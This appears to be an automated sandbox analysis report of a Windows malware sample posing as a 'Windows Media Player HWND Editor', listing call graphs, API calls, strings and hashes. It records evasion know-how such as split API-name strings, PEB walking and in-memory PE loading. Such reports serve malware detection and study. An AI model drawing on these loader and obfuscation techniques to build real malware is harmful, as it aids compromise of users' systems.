GetPEB 13745->13747 13746->13276 13749 21b110e 13747->13749 13748 21b4190 GetPEB 13748->13751 13750 21b40f0 GetPEB 13749->13750 13750->13746 13751->13745 13751->13746 13751->13748 13752 21b40f0 GetPEB 13751->13752 13752->13751 13757 21b22e5 13753->13757 13754 21b265e 13755 21b2653 13754->13755 13758 21b4570 GetPEB 13754->13758 13755->13301 13756 21b4190 GetPEB 13756->13757 13757->13754 13757->13755 13757->13756 13759 21b40f0 GetPEB 13757->13759 13758->13755 13759->13757 13761 21b1d5b 13760->13761 13762 21b1d71 13760->13762 13763 21b4190 GetPEB 13761->13763 13766 21b4190 GetPEB 13762->13766 13768 21b1dfe 13762->13768 13764 21b1d65 13763->13764 13765 21b40f0 GetPEB 13764->13765 13765->13762 13767 21b1df2 13766->13767 13769 21b40f0 GetPEB 13767->13769 13770 21b1e32 13768->13770 13771 21b4190 GetPEB 13768->13771 13769->13768 13774 21b51f0 GetPEB 13770->13774 13772 21b1e26 13771->13772 13773 21b40f0 GetPEB 13772->13773 13773->13770 13775 21b1e66 13774->13775 13775->13301 13782 21b1ed6 13776->13782 13777 21b1eff 13777->13301 13778 21b4190 GetPEB 13778->13782 13779 21b1fd3 13857 21b5320 13779->13857 13781 21b1fdf 13781->13301 13782->13777 13782->13778 13782->13779 13782->13781 13783 21b40f0 GetPEB 13782->13783 13783->13782 13788 21b2008 13784->13788 13785 21b2043 13785->13301 13786 21b4190 GetPEB 13786->13788 13787 21b22a2 13787->13785 13789 21b4570 GetPEB 13787->13789 13788->13785 13788->13786 13788->13787 13790 21b40f0 GetPEB 13788->13790 13789->13785 13790->13788 13804 21b2cd8 13791->13804 13792 21b3129 13795 21b3148 13792->13795 13796 21b4190 GetPEB 13792->13796 13793 21b2d6e 13793->13301 13794 21b4190 GetPEB 13794->13804 13795->13301 13799 21b313c 13796->13799 13797 21b35f0 GetPEB 13797->13804 13800 21b40f0 GetPEB 13799->13800 13800->13795 13801 21b40f0 GetPEB 13801->13804 13802 21b4570 GetPEB 13802->13804 13804->13792 13804->13793 13804->13794 13804->13797 13804->13801 13804->13802 13863 21b2a40 13804->13863 13876 21b5a60 13804->13876 13806 21b44c2 13805->13806 13807 21b44d0 13805->13807 13808 21b4190 GetPEB 13806->13808 13807->13301 13809 21b44c7 13808->13809 13810 21b40f0 GetPEB 13809->13810 13810->13807 13816 21b199f 13811->13816 13812 21b1c46 13813 21b36f0 GetPEB 13812->13813 13814 21b1c50 13813->13814 13818 21b4190 GetPEB 13814->13818 13823 21b1c71 13814->13823 13815 21b1c39 13815->13301 13816->13812 13816->13815 13817 21b4190 GetPEB 13816->13817 13821 21b5180 GetPEB 13816->13821 13831 21b36f0 GetPEB 13816->13831 13832 21b40f0 GetPEB 13816->13832 13817->13816 13819 21b1c65 13818->13819 13820 21b40f0 GetPEB 13819->13820 13820->13823 13821->13816 13822 21b1ca3 13826 21b1ccb 13822->13826 13828 21b4190 GetPEB 13822->13828 13823->13822 13824 21b4190 GetPEB 13823->13824 13825 21b1c97 13824->13825 13827 21b40f0 GetPEB 13825->13827 13826->13301 13827->13822 13829 21b1cbf 13828->13829 13830 21b40f0 GetPEB 13829->13830 13830->13826 13831->13816 13832->13816 13836 21b5206 13833->13836 13834 21b528d 13834->13301 13835 21b4190 GetPEB 13835->13836 13836->13834 13836->13835 13837 21b40f0 GetPEB 13836->13837 13837->13836 13839 21b5f90 13838->13839 13842 21b5fa6 13838->13842 13840 21b4190 GetPEB 13839->13840 13841 21b5f9a 13840->13841 13843 21b40f0 GetPEB 13841->13843 13844 21b4190 GetPEB 13842->13844 13848 21b5fce 13842->13848 13843->13842 13845 21b5fc2 13844->13845 13847 21b40f0 GetPEB 13845->13847 13846 21b6052 13846->13301 13847->13848 13848->13846 13849 21b6019 13848->13849 13850 21b4190 GetPEB 13848->13850 13853 21b6041 13849->13853 13854 21b4190 GetPEB 13849->13854 13851 21b600d 13850->13851 13852 21b40f0 GetPEB 13851->13852 13852->13849 13853->13301 13855 21b6035 13854->13855 13856 21b40f0 GetPEB 13855->13856 13856->13853 13858 21b5349 13857->13858 13859 21b535f 13857->13859 13860 21b4190 GetPEB 13858->13860 13859->13781 13861 21b5353 13860->13861 13862 21b40f0 GetPEB 13861->13862 13862->13859 13871 21b2a60 13863->13871 13864 21b2b7a 13865 21b2bc7 13864->13865 13867 21b2b9f 13864->13867 13868 21b4190 GetPEB 13864->13868 13865->13804 13866 21b4190 GetPEB 13866->13871 13867->13865 13873 21b4190 GetPEB 13867->13873 13870 21b2b93 13868->13870 13869 21b40f0 GetPEB 13869->13871 13872 21b40f0 GetPEB 13870->13872 13871->13864 13871->13866 13871->13869 13872->13867 13874 21b2bbb 13873->13874 13875 21b40f0 GetPEB 13874->13875 13875->13865 13880 21b5a71 13876->13880 13877 21b5b69 13878 21b5b62 13877->13878 13881 21b4190 GetPEB 13877->13881 13878->13804 13879 21b4190 GetPEB 13879->13880 13880->13877 13880->13878 13880->13879 13884 21b40f0 GetPEB 13880->13884 13882 21b5b7c 13881->13882 13883 21b40f0 GetPEB 13882->13883 13883->13878 13884->13880 13888 21b2690 13885->13888 13886 21b1958 13886->13363 13886->13364 13887 21b2a15 13889 21b4570 GetPEB 13887->13889 13888->13886 13888->13887 13890 21b4190 GetPEB 13888->13890 13891 21b40f0 GetPEB 13888->13891 13889->13886 13890->13888 13891->13888 13901 21b7992 13892->13901 13893 21b7af6 13894 21b7b15 13893->13894 13896 21b4190 GetPEB 13893->13896 13894->13401 13895 21b35f0 GetPEB 13895->13901 13899 21b7b09 13896->13899 13897 21b7a96 13897->13401 13898 21b4190 GetPEB 13898->13901 13900 21b40f0 GetPEB 13899->13900 13900->13894 13901->13893 13901->13895 13901->13897 13901->13898 13902 21b40f0 GetPEB 13901->13902 13902->13901 13913 1fd0000 13915 1fd0005 13913->13915 13918 1fd002d 13915->13918 13938 1fd0456 GetPEB 13918->13938 13921 1fd0456 GetPEB 13922 1fd0053 13921->13922 13923 1fd0456 GetPEB 13922->13923 13924 1fd0061 13923->13924 13925 1fd0456 GetPEB 13924->13925 13926 1fd006d 13925->13926 13927 1fd0456 GetPEB 13926->13927 13928 1fd007b 13927->13928 13929 1fd0456 GetPEB 13928->13929 13932 1fd0089 13929->13932 13930 1fd00e4 GetNativeSystemInfo 13931 1fd0107 VirtualAlloc 13930->13931 13936 1fd0029 13930->13936 13934 1fd012f 13931->13934 13932->13930 13932->13936 13933 1fd03b2 13940 21527b0 13933->13940 13934->13933 13935 1fd0388 VirtualProtect 13934->13935 13935->13934 13935->13936 13939 1fd0045 13938->13939 13939->13921 13943 2151000 13940->13943 13946 2151030 LoadLibraryW GetProcAddress 13943->13946 13987 2151b30 13946->13987 13949 2151091 SetLastError 13983 215102b ExitProcess 13949->13983 13950 21510a3 13951 2151b30 SetLastError 13950->13951 13952 21510b9 13951->13952 13953 21510f0 13952->13953 13954 21510de SetLastError 13952->13954 13952->13983 13955 2151111 13953->13955 13956 21510ff SetLastError 13953->13956 13954->13983 13957 215111c SetLastError 13955->13957 13959 215112e GetNativeSystemInfo 13955->13959 13956->13983 13957->13983 13960 21511bc 13959->13960 13961 21511d7 SetLastError 13960->13961 13962 21511e9 13960->13962 13961->13983 13990 2151800 VirtualAlloc 13962->13990 13963 2151202 13964 215123d GetProcessHeap RtlAllocateHeap 13963->13964 13991 2151800 VirtualAlloc 13963->13991 13965 2151257 SetLastError 13964->13965 13966 215127b 13964->13966 13965->13983 13970 2151b30 SetLastError 13966->13970 13967 2151222 13967->13964 13968 215122e SetLastError 13967->13968 13968->13983 13971 21512fb 13970->13971 13972 2151302 13971->13972 13992 2151800 VirtualAlloc 13971->13992 14018 21516c0 13972->14018 13973 2151320 13993 2151b50 13973->13993 13976 215136b 13976->13972 13999 21521a0 13976->13999 13980 21513ca 13980->13972 13981 21513eb 13980->13981 13982 21513ff GetPEB 13981->13982 13981->13983 13982->13983 13988 2151070 13987->13988 13989 2151b3b SetLastError 13987->13989 13988->13949 13988->13950 13988->13983 13989->13988 13990->13963 13991->13967 13992->13973 13994 2151b7d 13993->13994 13995 2151b30 SetLastError 13994->13995 13997 2151be9 13994->13997 13996 2151c32 13995->13996 13996->13997 14026 2151800 VirtualAlloc 13996->14026 13997->13976 14000 21513b5 13999->14000 14001 21521dd IsBadReadPtr 13999->14001 14000->13972 14012 2151e80 14000->14012 14001->14000 14003 2152207 14001->14003 14003->14000 14004 215224d 14003->14004 14005 2152239 SetLastError 14003->14005 14027 2151a20 14004->14027 14005->14000 14008 2152273 SetLastError 14008->14000 14010 215229d 14010->14000 14011 21523ae SetLastError 14010->14011 14011->14000 14015 2151eba 14012->14015 14013 2151fe5 14014 2151d10 2 API calls 14013->14014 14017 2151fc1 14014->14017 14015->14013 14015->14017 14042 2151d10 14015->14042 14017->13980 14019 21516d7 14018->14019 14020 21516d2 14018->14020 14021 21519d0 VirtualFree 14019->14021 14020->13983 14024 215170b 14021->14024 14022 2151770 GetProcessHeap HeapFree 14022->14020 14024->14022 14025 21519d0 VirtualFree 14024->14025 14025->14022 14026->13997 14028 2151a2c 14027->14028 14029 2151a35 14027->14029 14035 2151900 14028->14035 14033 2151a43 14029->14033 14038 21519f0 VirtualAlloc 14029->14038 14032 2151a51 14032->14033 14039 21519d0 14032->14039 14033->14008 14033->14010 14036 2151910 VirtualQuery 14035->14036 14037 215190c 14035->14037 14036->14037 14037->14029 14038->14032 14040 21519d9 VirtualFree 14039->14040 14041 21519ea 14039->14041 14040->14041 14041->14033 14043 2151d29 14042->14043 14047 2151d1f 14042->14047 14044 2151d37 14043->14044 14045 2151d9d VirtualProtect 14043->14045 14044->14047 14049 2151820 VirtualFree 14044->14049 14045->14047 14047->14015 14049->14047

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 401600-40162e LoadLibraryA GetProcAddress EncryptFileA 1 401630-40163c 0->1 2 40163f-40185c ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z * 2 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z LoadLibraryA GetProcAddress * 2 LdrFindResource_U 0->2 3 401878-4018c1 VirtualAlloc call 40100a call 401019 2->3 4 40185e-401872 LdrAccessResource 2->4 8 4018c6-4018db 3->8 4->3 10 4018e1-40195c LoadIconA LoadCursorA GetStockObject RegisterClassA 8->10 11 4019d3-401a3a CreateWindowExA ShowWindow UpdateWindow GetMessageA 8->11 10->11 14 40195e-4019d0 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z * 8 10->14 12 401a3c-401a42 11->12 13 401a6d-401a89 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z 11->13 15 401a48-401a6b TranslateMessage DispatchMessageA GetMessageA 12->15 16 401aa7-401ab9 13->16 17 401a8b-401a90 13->17 15->13 15->15 20 401ad7-401ae9 16->20 21 401abb-401ac0 16->21 18 401a92-401a94 17->18 19 401a9d-401aa4 ??3@YAXPAX@Z 17->19 18->19 22 401a96-401a9b 18->22 19->16 25 401b07-401b19 20->25 26 401aeb-401af0 20->26 23 401ac2-401ac4 21->23 24 401acd-401ad4 ??3@YAXPAX@Z 21->24 22->16 23->24 29 401ac6-401acb 23->29 24->20 27 401b37-401b49 25->27 28 401b1b-401b20 25->28 30 401af2-401af4 26->30 31 401afd-401b04 ??3@YAXPAX@Z 26->31 35 401b67-401b79 27->35 36 401b4b-401b50 27->36 33 401b22-401b24 28->33 34 401b2d-401b34 ??3@YAXPAX@Z 28->34 29->20 30->31 32 401af6-401afb 30->32 31->25 32->25 33->34 37 401b26-401b2b 33->37 34->27 40 401b97-401bac 35->40 41 401b7b-401b80 35->41 38 401b52-401b54 36->38 39 401b5d-401b64 ??3@YAXPAX@Z 36->39 37->27 38->39 44 401b56-401b5b 38->44 39->35 42 401bd7-401be3 40->42 43 401bae-401bb3 40->43 45 401b82-401b84 41->45 46 401b8d-401b94 ??3@YAXPAX@Z 41->46 47 401bb5-401bb7 43->47 48 401bcd-401bd4 ??3@YAXPAX@Z 43->48 44->35 45->46 49 401b86-401b8b 45->49 46->40 47->48 50 401bb9-401bca 47->50 48->42 49->40
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(Advapi32.dll,EncryptFileA), ref: 0040161A
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401623
                                                                                      • EncryptFileA.ADVAPI32(C:\Windows\Setup\State\State.ini), ref: 0040162A
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60 ref: 0040167D
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(LdrFin), ref: 0040169F
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 004016B2
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(dReso), ref: 004016D1
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 004016E4
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(urce_U), ref: 00401703
                                                                                      • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?), ref: 00401723
                                                                                      • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401731
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401742
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401755
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(Ldr), ref: 00401774
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401787
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(Acces), ref: 004017A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1321303843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1321284705.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321339220.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$Tidy@?$basic_string@$?assign@?$basic_string@V12@$D@2@@0@Hstd@@V10@0@V?$basic_string@$AddressEncryptFileLibraryLoadProc
                                                                                      • String ID: Acces$Advapi32.dll$C:\Windows\Setup\State\State.ini$EncryptFileA$GIh@36E#YEA1tFmFqw44wMs%bm^9R?qzDkkk^Ht+tywp2T&M8aVQ1wu#c<eCQglgS+m&KyvZQb_x!tLZTbzSj4!?m$5vwsutammbhRsGHUifpf$Ldr$LdrAccessResource$LdrFin$LdrFindResource_U$WMPlayerWindowEditor$Windows Media Player HWND Editor$dReso$ntdll.dll$sResource$urce_U
                                                                                      • API String ID: 3516244591-712066751
                                                                                      • Opcode ID: f8c8bf3419da7efc3c2f758ebdd38b7438056af9a9bfe9611bd3ddaf80b0cfcc
                                                                                      • Instruction ID: dce9f58f7b180b880584391d3317b87618375bb0fe771e7de301abb772954e00
                                                                                      • Opcode Fuzzy Hash: f8c8bf3419da7efc3c2f758ebdd38b7438056af9a9bfe9611bd3ddaf80b0cfcc
                                                                                      • Instruction Fuzzy Hash: FDF1E4711183809FD324DF60CC49BAFBBA4EB84310F40493EF586632D1EBB99909CB5A

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 59 2151030-2151075 LoadLibraryW GetProcAddress call 2151b30 62 2151077-2151079 59->62 63 215107e-215108f 59->63 64 215148d-2151490 62->64 65 2151091-215109e SetLastError 63->65 66 21510a3-21510be call 2151b30 63->66 65->64 69 21510c7-21510dc 66->69 70 21510c0-21510c2 66->70 71 21510f0-21510fd 69->71 72 21510de-21510eb SetLastError 69->72 70->64 73 2151111-215111a 71->73 74 21510ff-215110c SetLastError 71->74 72->64 75 215111c-2151129 SetLastError 73->75 76 215112e-215114f 73->76 74->64 75->64 77 2151163-215116d 76->77 78 21511a5-21511d5 GetNativeSystemInfo call 21518d0 * 2 77->78 79 215116f-2151176 77->79 90 21511d7-21511e4 SetLastError 78->90 91 21511e9-215120c call 2151800 78->91 80 2151186-2151192 79->80 81 2151178-2151184 79->81 84 2151195-215119b 80->84 81->84 86 21511a3 84->86 87 215119d-21511a0 84->87 86->77 87->86 90->64 93 215123d-2151255 GetProcessHeap RtlAllocateHeap 91->93 94 215120e-215121f call 2151800 91->94 95 2151257-2151276 SetLastError 93->95 96 215127b-2151291 93->96 99 2151222-215122c 94->99 95->64 97 2151293-215129a 96->97 98 215129c 96->98 100 21512a3-2151300 call 2151b30 97->100 98->100 99->93 101 215122e-2151238 SetLastError 99->101 105 2151307-2151370 call 2151800 call 2151980 call 2151b50 100->105 106 2151302 100->106 101->64 115 2151377-2151388 105->115 116 2151372 105->116 107 215147f-215148b call 21516c0 106->107 107->64 117 21513a2-21513a5 115->117 118 215138a-21513a0 call 2152090 115->118 116->107 120 21513ac-21513ba call 21521a0 117->120 118->120 124 21513c1-21513c5 call 2151e80 120->124 125 21513bc 120->125 127 21513ca-21513cf 124->127 125->107 128 21513d6-21513e4 call 2152010 127->128 129 21513d1 127->129 132 21513e6 128->132 133 21513eb-21513f4 128->133 129->107 132->107 134 21513f6-21513fd 133->134 135 2151470-2151473 133->135 136 215145d-215146b 134->136 137 21513ff-215145b GetPEB 134->137 138 215147a-215147d 135->138 139 215146e 136->139 137->139 138->64 139->138
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(02154054,02154040), ref: 02151047
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0215104E
                                                                                        • Part of subcall function 02151B30: SetLastError.KERNEL32(0000000D,?,02151070,?,00000040), ref: 02151B3D
                                                                                      • SetLastError.KERNEL32(000000C1), ref: 02151096
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322259807.0000000002151000.00000020.00001000.00020000.00000000.sdmp, Offset: 02151000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_2151000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                      • String ID:
                                                                                      • API String ID: 1866314245-0
                                                                                      • Opcode ID: 1c70ebbdf06eb527305580aeb69db7613f0e5eb50ac8203d339ee57ead50b6cf
                                                                                      • Instruction ID: 491529c3653632bbc86f1a0f068b7ee0f56f1a48ae8505bacccf1d52660e7627
                                                                                      • Opcode Fuzzy Hash: 1c70ebbdf06eb527305580aeb69db7613f0e5eb50ac8203d339ee57ead50b6cf
                                                                                      • Instruction Fuzzy Hash: F5F1E6B4E40219EFDB04CF94D994BAEB7B1BF48304F208598E929AB341D775EA51CF90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 144 21b8330-21b843a 145 21b8442-21b8447 144->145 146 21b8450-21b8456 145->146 147 21b845c 146->147 148 21b8646-21b864c 146->148 149 21b85fe-21b8641 call 21bbaa0 147->149 150 21b8462-21b8468 147->150 151 21b864e-21b8654 148->151 152 21b86ac-21b86b1 148->152 149->146 154 21b846e-21b8474 150->154 155 21b854d-21b8561 call 21b35f0 150->155 156 21b86b6-21b86bd 151->156 157 21b8656-21b865c 151->157 152->146 161 21b84de-21b8515 154->161 162 21b8476-21b847c 154->162 179 21b8563-21b857b call 21b4190 call 21b40f0 155->179 180 21b8581-21b85a9 155->180 159 21b86da-21b86db CloseHandle 156->159 160 21b86bf-21b86d5 call 21b4190 call 21b40f0 156->160 164 21b865e-21b8665 157->164 165 21b8693-21b8699 157->165 174 21b86dd-21b86e9 159->174 160->159 166 21b8532-21b8548 SetFileInformationByHandle 161->166 167 21b8517-21b852d call 21b4190 call 21b40f0 161->167 162->165 170 21b8482-21b848a 162->170 172 21b8682-21b868e 164->172 173 21b8667-21b867d call 21b4190 call 21b40f0 164->173 165->146 168 21b869f-21b86ab 165->168 166->146 167->166 177 21b84aa-21b84ce CreateFileW 170->177 178 21b848c-21b84a4 call 21b4190 call 21b40f0 170->178 172->146 173->172 177->174 188 21b84d4-21b84d9 177->188 178->177 179->180 195 21b85ab-21b85c1 call 21b4190 call 21b40f0 180->195 196 21b85c6-21b85d1 180->196 188->146 195->196 207 21b85ee-21b85f9 196->207 208 21b85d3-21b85e9 call 21b4190 call 21b40f0 196->208 207->145 208->207
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,000001C3,00000000,?,38CFF007,?,?), ref: 021B84C7
                                                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 021B853C
                                                                                      • CloseHandle.KERNELBASE(?,?,38CFF007,?,?), ref: 021B86DB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileHandle$CloseCreateInformation
                                                                                      • String ID: @$iL`2$iL`2$12$V^!
                                                                                      • API String ID: 1240749428-1221398831
                                                                                      • Opcode ID: 596545ae51faefc2cbf7c3a7f2886ac0bb082c9eb62e14ea0b608f2d8e205852
                                                                                      • Instruction ID: b307a3171a7ede1b06a9375dfd45c5142721078fd82af559ab3d3d102372400d
                                                                                      • Opcode Fuzzy Hash: 596545ae51faefc2cbf7c3a7f2886ac0bb082c9eb62e14ea0b608f2d8e205852
                                                                                      • Instruction Fuzzy Hash: C591AE71A483018FD719DE28E9946AFBBF9AFC4704F10892DF48A9B290D774D9448F92

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 215 21b5390-21b53a7 216 21b53ac 215->216 217 21b53b0-21b53b6 216->217 218 21b556e-21b5574 217->218 219 21b53bc 217->219 220 21b557a 218->220 221 21b5698-21b569e 218->221 222 21b54ec-21b54f3 219->222 223 21b53c2-21b53c8 219->223 226 21b562e-21b5635 220->226 227 21b5580-21b5586 220->227 230 21b555d-21b5563 221->230 231 21b56a4-21b56b7 221->231 224 21b5510-21b553a 222->224 225 21b54f5-21b550b call 21b4190 call 21b40f0 222->225 228 21b53ca 223->228 229 21b5426-21b542c 223->229 262 21b553c-21b5552 call 21b4190 call 21b40f0 224->262 263 21b5557 224->263 225->224 241 21b5652-21b565d 226->241 242 21b5637-21b564d call 21b4190 call 21b40f0 226->242 235 21b559a-21b55a1 227->235 236 21b5588-21b558e 227->236 239 21b56bc-21b56c3 228->239 240 21b53d0-21b53d6 228->240 237 21b542e-21b5434 229->237 238 21b5480-21b5487 229->238 232 21b5569 230->232 233 21b570e-21b5715 230->233 231->217 232->216 253 21b55be-21b55e0 235->253 254 21b55a3-21b55b9 call 21b4190 call 21b40f0 235->254 236->230 249 21b5590-21b5595 236->249 237->230 250 21b543a-21b5441 237->250 246 21b5489-21b549f call 21b4190 call 21b40f0 238->246 247 21b54a4-21b54af 238->247 244 21b56e0-21b56eb 239->244 245 21b56c5-21b56db call 21b4190 call 21b40f0 239->245 251 21b53d8-21b53de 240->251 252 21b53f2-21b53f9 240->252 278 21b567a-21b5688 RtlAllocateHeap 241->278 279 21b565f-21b5675 call 21b4190 call 21b40f0 241->279 242->241 288 21b5708-21b570c RtlFreeHeap 244->288 289 21b56ed-21b5703 call 21b4190 call 21b40f0 244->289 245->244 246->247 297 21b54cc-21b54e7 247->297 298 21b54b1-21b54c7 call 21b4190 call 21b40f0 247->298 249->217 260 21b545e-21b547b 250->260 261 21b5443-21b5459 call 21b4190 call 21b40f0 250->261 251->230 267 21b53e4-21b53f0 call 21b4570 251->267 256 21b53fb-21b5411 call 21b4190 call 21b40f0 252->256 257 21b5416-21b5419 252->257 286 21b541f-21b5424 253->286 287 21b55e6-21b55ed 253->287 254->253 256->257 257->286 260->216 261->260 262->263 263->230 267->216 278->233 296 21b568e-21b5693 278->296 279->278 286->216 303 21b560a-21b5629 287->303 304 21b55ef-21b5605 call 21b4190 call 21b40f0 287->304 288->233 289->288 296->216 297->216 298->297 303->217 304->303
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,?,?,?,?,021B8CFA), ref: 021B5682
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,021B8CFA), ref: 021B570C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocateFree
                                                                                      • String ID: p^sw$12$12$12$J`
                                                                                      • API String ID: 2488874121-2896302409
                                                                                      • Opcode ID: 5e0bfe95f732a7905486466a2a5e083813f252920a02e4176e0d25b1636726a9
                                                                                      • Instruction ID: 29e89f9de61bea9fa1ccc4f8a5418b5f47afcb989ffdf3ae5b35da568c44df46
                                                                                      • Opcode Fuzzy Hash: 5e0bfe95f732a7905486466a2a5e083813f252920a02e4176e0d25b1636726a9
                                                                                      • Instruction Fuzzy Hash: AC81F831FC4201AFDA166B79AC607EF26F7AF84344F854839E815DB351EB64DC118B91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
